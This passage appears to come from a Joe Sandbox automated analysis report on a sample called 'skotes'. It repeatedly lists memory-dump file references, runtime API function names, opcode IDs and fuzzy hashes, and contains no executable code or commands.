                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: List$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
                                                                                                                                            • String ID: eventObject
                                                                                                                                            • API String ID: 1288476792-1680012138
                                                                                                                                            • Opcode ID: 19d7feed1f7bc332586a2f70afda9bfd69c1dcb8234b304d5a7fd7a40ee27512
                                                                                                                                            • Instruction ID: 1df9ec44431ea9eaca959974db4d606e006326462e93577579fd8255d3bb1467
                                                                                                                                            • Opcode Fuzzy Hash: 19d7feed1f7bc332586a2f70afda9bfd69c1dcb8234b304d5a7fd7a40ee27512
                                                                                                                                            • Instruction Fuzzy Hash: 42114435A80204EBCB24EBA9CD8AFEE77B85F10380F604965F505B60D1DB70EA04C671
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 00AEA102
                                                                                                                                            • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 00AEA126
                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00AEA139
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
                                                                                                                                            • String ID: pScheduler
                                                                                                                                            • API String ID: 246774199-923244539
                                                                                                                                            • Opcode ID: 9af1721657f5904754eb5bf49462b192f139430439247d453223e0ae6376851d
                                                                                                                                            • Instruction ID: 38b076badf953e95bb6928c39978d36236db7b8a49035a095a9a9d03e9332688
                                                                                                                                            • Opcode Fuzzy Hash: 9af1721657f5904754eb5bf49462b192f139430439247d453223e0ae6376851d
                                                                                                                                            • Instruction Fuzzy Hash: 7BF09E36A00244E3C720FB55ED93C9EB3B89FA0720B50C269E50623181DF70BE06C7A2
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strrchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3213747228-0
                                                                                                                                            • Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                                            • Instruction ID: dd109dc12240b70ca7c1ee05780473a8cbffe9368e155d1aac5b8166fb406241
                                                                                                                                            • Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                                            • Instruction Fuzzy Hash: EAB1153290464D9FDB15CFAAC9817BEBBF5EF45360F1441AAFA45EB241D6348E02CB60
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __alloca_probe_16__freea
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1635606685-0
                                                                                                                                            • Opcode ID: 8c76018f3fdce506dd600883a25153e114808c5e822207768a652677189cb872
                                                                                                                                            • Instruction ID: d638e298deff6007776472451b7b93b8c6892bd166abed8a778184b7b6877aa5
                                                                                                                                            • Opcode Fuzzy Hash: 8c76018f3fdce506dd600883a25153e114808c5e822207768a652677189cb872
                                                                                                                                            • Instruction Fuzzy Hash: 58819271E0025A9EDF219FA48881AEE7FF5DF49354F198196E900B72C1E735DD608BA0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
